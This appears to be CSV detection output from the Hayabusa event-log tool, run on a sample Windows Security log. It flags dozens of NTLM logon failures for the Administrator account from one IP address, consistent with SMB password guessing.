2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
